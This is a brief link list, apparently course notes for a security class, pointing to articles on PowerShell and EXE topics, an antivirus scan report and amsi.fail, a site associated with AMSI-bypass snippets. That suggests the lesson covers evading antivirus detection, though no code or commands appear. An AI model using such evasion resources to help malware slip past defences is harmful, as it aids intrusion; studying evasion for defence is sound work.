-------------A0L9E8X7 BJSDFZ Class 15

-==[References]==-
PowerShell section:

https://www.cnblogs.com/chen-w/p/14726549.html

http://www.virscan.org/report/32bf9ca74eba65594c99a907e427487900690ae05a6ae6f6a1514b597cc8e714

https://blog.csdn.net/qq_50854790/article/details/124705800

https://cloud.tencent.com/developer/article/1799004?from=article.detail.1895835

https://cloud.tencent.com/developer/article/1078147?from=article.detail.1895835

https://amsi.fail/

EXE section:

https://blog.csdn.net/fallfeather/article/details/104274740

ASCII art:

http://patorjk.com/software
